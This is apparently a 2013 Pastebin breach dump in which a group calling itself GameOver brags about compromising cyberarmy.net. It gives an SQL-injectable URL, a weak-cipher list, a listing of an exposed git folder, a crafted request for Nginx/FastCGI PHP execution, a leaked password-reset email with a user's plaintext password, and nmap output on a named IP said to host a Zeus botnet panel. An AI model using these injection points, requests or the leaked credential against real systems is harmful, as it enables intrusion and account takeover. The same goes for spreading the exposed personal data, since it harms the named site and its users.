Advertisement
Guest User

#GameOver CyberArmy.net

a guest
Jan 8th, 2013
778
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.51 KB | None | 0 0
  1.  
  2. MMMMMMMMMMM M MMMMMMMMMM MM MMMMMMMM$ MMMMMMMMM MMMMMMMMMMM
  3. MMMMMMMMMMMMM MM =MMMMMMMMMM MM MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
  4. MMMMMMM MMMMMMM MM MMMMMMMMMMM ~M MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
  5. MMMMMMM IMMMMMM :M MMMMMMMMMMM M MMMMMMMMM OMMMMMMMMM MMMMMMM
  6. MMMMMMM IMMMMMM ,+ MMMMMMMMMMM7 M MMMMMMMMM MMMMMMMMMM MMMMMMM
  7. MMMMMMM IMMMMMM MMMMMMMMMMMM = MMMMMMMMMMMMMMMMMMMM MMMMMMM
  8. MMMMMMM M IMMMMM:MMMMMM ~ MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
  9. MMMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
  10. MMMMMMMMMMMMMMM MMMMMM +MMMMM= MMMMMMMMMMMMM$MMMMMM MMMMMMMMMMM
  11. MMMMMMM MMMMMM MMMMMM MMMMMM MMMMMM+MMMMMM MMMMMM MMMMMMM
  12. MMMMMMM MMMMMM MMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMM MMMMMMM
  13. DDDDDDD DDDDDD ?DDDDDDDDDDDDDD DDDDDD DDDDDD DDDDDD DDDDDDD
  14. 8888888 ~888888 888888888888888 888888 88888? 888888 88888888888
  15. =OOOOOOOOOOOOOO OOOOOOO OOOOOOZ OOOOOO OOOOO OOOOOO OOOOOOOOOOO
  16.  
  17.  
  18.  
  19. NMMMMMN M ~IIIIII: IIIIIII IIIIIIIIIII IIIIIII= IIIIII
  20. ~MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
  21. MMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMMM MMMMMM
  22. MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
  23. MMMMMMM MMMMMMM MMMMMMM MMMMMM MMMMMMM MMMMMM MMMMMM OMMMMM
  24. MMMMMMM MMMMMMM MMMMMM ~MMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
  25. MMMMMMM MMMMMMM MMMMMM=OMMMMMM MMMMMMM MMMMMM ?MMMMMM MMMMMM
  26. MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
  27. MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
  28. MMMMMMM MMMMMMM =MMMMMMMMMMMM= MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
  29. MMMMMMM MMMMMMM MMMMMMMMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
  30. NNNNNNN NNNNNNN NNNNNNNNNNNN NNNNNNN NNNNNN NNNNNN MNNNNN
  31. DDDDDDD DDDDDDD DDDDDDDDDDDD DDDDDDD DDDDDD DDDDDD
  32. 8888888 8888888 ?88888888888 88888888888 888888 888888 888888
  33. OOOOOOOOOOOOO = OOOOOOOOOO, OOOOOOOOOOO OOOOOO OOOOOO OOOOOO
  34. ZZZZZZZZZZZ . ZZZZZZZZZZ ZZZZZZZZZZZ ZZZZZZ ZZZZZZ ZZZZZ
  35.  
  36. ==============================================================================
  37. Target : www.cyberarmy.net
  38. ==============================================================================
  39.  
  40. [*]SQL
  41.  
  42. [+] Injection www.cyberarmy.net/mess/index.php?action=finishopenidlogin
  43. [-] DB Null %
  44.  
  45. Fucking SQL Server With No Database!
  46.  
  47. [+]SSL Fucked
  48.  
  49. SSL_DES_64_CBC_WITH_MD5
  50. SSL_RC2_128_CBC_EXPORT40_WITH_MD5
  51. SSL_RC4_128_EXPORT40_WITH_MD5
  52. TLS_DHE_RSA_WITH_DES_CBC_SHA
  53. TLS_RSA_WITH_DES_CBC_SHA
  54. TLS_RSA_DES_40_SHA
  55. TLS_RSA_RC2_40_MD5
  56. TLS_RSA_RC4_40_MD5
  57.  
  58. [*]Git Repository
  59.  
  60. $ cd /usr/local/www/public/mess/.git/
  61. $ ls
  62.  
  63. .gitignore
  64. COPYING
  65. EVENTS.txt
  66. Makefile
  67. README
  68. actions/accessadminpanel.php
  69. actions/accesstoken.php
  70. actions/all.php
  71. actions/allrss.php
  72. actions/apiaccountratelimitstatus.php
  73. ...
  74.  
  75. [*]Nginx PHP code execution via FastCGI
  76.  
  77. GET /GameOver.txt/hacked.php HTTP/1.1
  78. Cookie: PHPSESSID=5b68776ed8c3807c04116631346d8be2
  79. Host: cyberarmy.net
  80. Connection: Keep-alive
  81. Accept-Encoding: gzip,deflate
  82. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
  83. Accept: */*
  84. Content-Length: 6
  85.  
  86. www.cyberarmy.net/GameOver.txt/hacked.php
  87.  
  88. [*]IRC.CyberArmy.Net Fucked
  89.  
  90. eY3OwNYoUaLL fucked irc.cyberarmy.net
  91.  
  92. [email protected]> From: "CyberArmy"
  93. [email protected]> To: "ViRsOveRiD"
  94. [email protected]> Date: 28 Oct 2004, 01:09:30 PM
  95. [email protected]> Subject: Password Successfully Reset
  96. [email protected]> (virsoverid)
  97. [email protected]> ----------------------------------------
  98. [email protected]> ---------------------------------------
  99. [email protected]> The following is an automated email from
  100. [email protected]> CyberArmy.
  101. [email protected]> Hello,virsoverid
  102. [email protected]> This is a confirmation that your
  103. [email protected]> CyberArmy password
  104. [email protected]> has been reset to: 19aHPxl6
  105.  
  106. ==============================================================================
  107. [+]Ports (Zues Botnet Hosted)
  108.  
  109. [*]22/tcp on 78.47.201.59
  110.  
  111. [*]25/tcp on 78.47.201.59
  112.  
  113. [*]80/tcp on 78.47.201.59
  114.  
  115. [*]443/tcp on 78.47.201.59
  116.  
  117. [*]53/tcp on 78.47.201.59
  118.  
  119. [*]9001/tcp on 78.47.201.59
  120.  
  121. citadel.cyberarmy.net
  122.  
  123. ------------------------------------------------------------------------------
  124.  
  125. 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
  126.  
  127. [*]ssh-hostkey: 1024 63:67:96:94:fd:65:b5:e0:f0:d8:d2:d3:ef:c9:8e:b8 (DSA)
  128.  
  129. [*]2048 ff:c2:0f:2a:24:62:3c:3d:88:cd:6f:bd:c1:c1:5e:0c (RSA)
  130.  
  131. ------------------------------------------------------------------------------
  132.  
  133. 25/tcp open smtp Sendmail 8.14.4/8.14.4
  134.  
  135. [*]smtp-commands: citadel.cyberarmy.net Hello [209.126.156.136], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
  136.  
  137. [*]2.0.0 This is sendmail version 8.14.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
  138.  
  139. ------------------------------------------------------------------------------
  140.  
  141. 53/tcp open domain ISC BIND 9.6.-ESV-R3
  142.  
  143. [*]dns-nsid:
  144.  
  145. [*]bind.version: 9.6.-ESV-R3
  146.  
  147. ------------------------------------------------------------------------------
  148.  
  149. 80/tcp open http nginx 1.0.4
  150.  
  151. [*]http-favicon: Unknown favicon MD5: B55D9F9D989F354D30F36BDBE863A43D
  152.  
  153. [*]http-methods: No Allow or Public header in OPTIONS response (status code 301)
  154.  
  155. [*]http-robots.txt: 2 disallowed entries
  156.  
  157. [*]/wiki/Special /wiki/index.php
  158.  
  159. [*]http-title: cyberarmy
  160.  
  161. [*]Requested resource was http://cyberarmy.net/
  162.  
  163. ------------------------------------------------------------------------------
  164.  
  165. 443/tcp open http nginx 1.0.4
  166.  
  167. [*]http-methods: No Allow or Public header in OPTIONS response (status code 400)
  168.  
  169. [*]http-title: 400 The plain HTTP request was sent to HTTPS port
  170.  
  171. [*]ssl-cert: Subject: commonName=cyberarmy.net
  172.  
  173. [*]Issuer: commonName=PositiveSSL CA/organizationName=Comodo CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
  174.  
  175. [*]Public Key type: rsa
  176.  
  177. [*]Public Key bits: 2048
  178.  
  179. [*]Not valid before: 2010-02-17T00:00:00+00:00
  180.  
  181. [*]Not valid after: 2011-02-17T23:59:59+00:00
  182.  
  183. [*]MD5: 687f 0fb1 c115 7c8e e9b4 e484 1d35 7c98
  184.  
  185. [*]SHA-1: 2ad7 17f9 64b4 0aa1 3299 5d2b 1aea 6900 2711 93f7
  186.  
  187. [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
  188.  
  189. [*]sslv2: server still supports SSLv2
  190.  
  191. ------------------------------------------------------------------------------
  192.  
  193. 9001/tcp open ssl/tor-orport?
  194.  
  195. [*]ssl-cert: Subject: commonName=www.ltfyd4rl5ma.net
  196.  
  197. [*]Issuer: commonName=www.4k56hozvhnjr35am5.net
  198.  
  199. [*]Public Key type: rsa
  200.  
  201. [*]Public Key bits: 1024
  202.  
  203. [*]Not valid before: 2013-01-08T08:24:25+00:00
  204.  
  205. [*]Not valid after: 2013-01-08T10:24:25+00:00
  206.  
  207. [*]MD5: 201a 82a0 1af8 d425 1196 dec2 b379 2f0d
  208.  
  209. [*]SHA-1: ff9c 11ce 8087 310c 24c5 9722 e1d2 48d8 54ed 0984
  210.  
  211. [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
  212.  
  213. ------------------------------------------------------------------------------
  214.  
  215. Zues Botnet Hosted On citadel.cyberarmy.net
  216.  
  217. [*]9090/tcp closed zeus-admin
  218.  
  219. [*]9091/tcp closed xmltec-xmlmail
  220.  
  221. ==============================================================================
  222.  
  223. [+]Operating System
  224.  
  225. Running: FreeBSD 7.X
  226.  
  227. OS CPE: cpe:/o:freebsd:freebsd:7
  228.  
  229. OS details: FreeBSD 7.1-PRERELEASE 7.2-STABLE, FreeBSD 7.2-RELEASE - 8.0-RELEASE
  230.  
  231. Uptime guess: 0.000 days (since Tue Jan 08 00:57:27 2013)
  232.  
  233. IP ID Sequence Generation: Busy server or unknown class
  234.  
  235. Service Info: OSs: FreeBSD, Unix; CPE: cpe:/o:freebsd:freebsd
  236.  
  237. ==============================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement